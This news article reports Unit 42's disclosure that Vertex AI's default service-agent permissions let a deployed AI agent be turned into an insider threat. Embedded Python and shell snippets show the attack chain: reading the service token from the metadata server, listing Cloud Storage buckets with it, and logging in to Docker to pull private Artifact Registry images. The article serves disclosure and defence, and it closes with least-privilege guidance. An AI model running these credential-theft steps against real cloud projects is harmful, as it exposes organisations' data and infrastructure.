Vertex AI Vulnerability Exposes Google Cloud Data and Private Artifacts
2026-03-31 13:09 · Author: thehackernews.com

Cloud Security / AI Security

Cybersecurity researchers have disclosed a security "blind spot" in Google Cloud's Vertex AI platform that could allow artificial intelligence (AI) agents to be weaponized by an attacker to gain unauthorized access to sensitive data and compromise an organization's cloud environment.

According to Palo Alto Networks Unit 42, the issue stems from the Vertex AI permission model, which can be abused because the platform's service agent is granted excessively broad permissions by default.

"A misconfigured or compromised agent can become a 'double agent' that appears to serve its intended purpose, while secretly exfiltrating sensitive data, compromising infrastructure, and creating backdoors into an organization's most critical systems," Unit 42 researcher Ofir Shaty said in a report shared with The Hacker News.

Specifically, the cybersecurity company found that the Per-Project, Per-Product Service Agent (P4SA) associated with a deployed AI agent built using Vertex AI's Agent Development Kit (ADK) had excessive permissions granted by default. This opened the door to a scenario where the P4SA's default permissions could be used to extract the credentials of a service agent and conduct actions on its behalf.

Once the Vertex agent is deployed via Agent Engine, any call to the agent can be used to query Google's metadata service, which exposes the service agent's credentials along with the Google Cloud Platform (GCP) project that hosts the AI agent, the agent's identity, and the OAuth scopes of the machine hosting it.
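The metadata service mentioned above is GCP's standard metadata server, which any workload can reach over HTTP. As a hypothetical sketch of what a tool call executing inside the agent could query (the endpoint and the mandatory `Metadata-Flavor` header are GCP's documented defaults; the attack framing is illustrative):

```python
# Hypothetical sketch: requests an attacker-influenced tool running inside
# a deployed agent could send to GCP's metadata server. The endpoint and
# header are documented GCP defaults; no Vertex-specific API is involved.
import urllib.request

METADATA_BASE = "http://metadata.google.internal/computeMetadata/v1"

def metadata_request(path: str) -> urllib.request.Request:
    """Build a metadata-server request; the Metadata-Flavor header is mandatory."""
    return urllib.request.Request(
        f"{METADATA_BASE}/{path}",
        headers={"Metadata-Flavor": "Google"},
    )

# Paths matching the exposures described in the report:
TOKEN_PATH = "instance/service-accounts/default/token"    # OAuth2 access token
EMAIL_PATH = "instance/service-accounts/default/email"    # service agent identity
SCOPES_PATH = "instance/service-accounts/default/scopes"  # granted OAuth scopes
PROJECT_PATH = "project/project-id"                       # hosting GCP project
```

Running this outside GCP simply fails to resolve the host; inside a deployed agent, each response feeds the next stage of the attack chain described below.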

Unit 42 said it was able to use the stolen credentials to jump from the AI agent's execution context into the customer project, effectively undermining isolation guarantees and permitting unrestricted read access to all Google Cloud Storage buckets' data within that project.
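With a stolen token in hand, bucket enumeration needs nothing beyond the public Cloud Storage JSON API. A hypothetical sketch of the request an attacker could issue from their own machine (project ID and token are placeholders):

```python
# Hypothetical sketch: using stolen service-agent credentials from outside
# the agent to enumerate a project's Cloud Storage buckets via the
# documented GCS JSON API. Project ID and token are placeholders.
import urllib.parse
import urllib.request

def list_buckets_request(project_id: str, access_token: str) -> urllib.request.Request:
    """Build a GCS JSON API request that lists every bucket in the project."""
    query = urllib.parse.urlencode({"project": project_id})
    return urllib.request.Request(
        f"https://storage.googleapis.com/storage/v1/b?{query}",
        headers={"Authorization": f"Bearer {access_token}"},
    )

# Given the P4SA's broad default permissions, iterating the response and
# issuing per-bucket object listings would yield project-wide read access.
```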

"This level of access constitutes a significant security risk, transforming the AI agent from a helpful tool into a potential insider threat," it added.

That's not all. Because the deployed Vertex AI Agent Engine runs within a Google-managed tenant project, the extracted credentials could also enumerate the Google Cloud Storage buckets within that tenant, revealing details about the platform's internal infrastructure; however, the credentials lacked the permissions needed to read those buckets' contents.

To make matters worse, the same P4SA service agent credentials also enabled access to restricted, Google-owned Artifact Registry repositories that were revealed during the deployment of the Agent Engine. An attacker could leverage this behavior to download container images from private repositories that constitute the core of the Vertex AI Reasoning Engine.
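Pulling from Artifact Registry with a leaked token uses Docker's standard `oauth2accesstoken` login flow, which Google documents for access-token authentication. A hypothetical end-to-end sketch; the registry host and image path are illustrative placeholders, not the actual private repositories Unit 42 observed:

```shell
# Hypothetical: turn a leaked P4SA access token into an Artifact Registry
# pull. Step 1 reads the token from the metadata server (only works from
# inside a GCP workload); step 2 uses Docker's documented
# oauth2accesstoken login; the image path is purely illustrative.
TOKEN="$(curl -s -H 'Metadata-Flavor: Google' \
  'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' \
  | python3 -c 'import sys, json; print(json.load(sys.stdin)["access_token"])')"

echo "$TOKEN" | docker login -u oauth2accesstoken --password-stdin us-docker.pkg.dev

# Placeholder path; real image names surfaced in Agent Engine deploy logs.
docker pull us-docker.pkg.dev/example-google-project/reasoning-engine/worker:latest
```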

What's more, the compromised P4SA credentials not only made it possible to download images that were listed in logs during the Agent Engine deployment, but also exposed the contents of Artifact Registry repositories, including several other restricted images. 

"Gaining access to this proprietary code not only exposes Google's intellectual property, but also provides an attacker with a blueprint to find further vulnerabilities," Unit 42 explained. 

"The misconfigured Artifact Registry highlights a further flaw in access control management for critical infrastructure. An attacker could potentially leverage this unintended visibility to map Google's internal software supply chain, identify deprecated or vulnerable images, and plan further attacks."

Google has since updated its official documentation to clearly spell out how Vertex AI uses resources, accounts, and agents. The tech giant has also recommended that customers use Bring Your Own Service Account (BYOSA) to replace the default service agent and enforce the principle of least privilege (PoLP) to ensure that the agent has only the permissions it needs to perform the task at hand.
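In practice, BYOSA plus least privilege means creating a dedicated service account and binding only the roles the agent actually needs, instead of inheriting the P4SA's broad defaults. A minimal, illustrative IAM policy fragment (the role names are real predefined GCP roles; the account, project, and bucket names are placeholders, and the exact hook for attaching the account at Agent Engine deployment depends on your SDK version):

```json
{
  "bindings": [
    {
      "members": ["serviceAccount:agent-sa@my-project.iam.gserviceaccount.com"],
      "role": "roles/aiplatform.user"
    },
    {
      "members": ["serviceAccount:agent-sa@my-project.iam.gserviceaccount.com"],
      "role": "roles/storage.objectViewer",
      "condition": {
        "title": "only-agent-bucket",
        "expression": "resource.name.startsWith(\"projects/_/buckets/agent-data-bucket\")"
      }
    }
  ]
}
```

The IAM condition confines storage reads to a single named bucket rather than every bucket in the project, which is exactly the blast-radius reduction the research argues for.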

"Granting agents broad permissions by default violates the principle of least privilege and is a dangerous security flaw by design," Shaty said. "Organizations should treat AI agent deployment with the same rigor as new production code. Validate permission boundaries, restrict OAuth scopes to least privilege, review source integrity and conduct controlled security testing before production rollout."



Source: https://thehackernews.com/2026/03/vertex-ai-vulnerability-exposes-google.html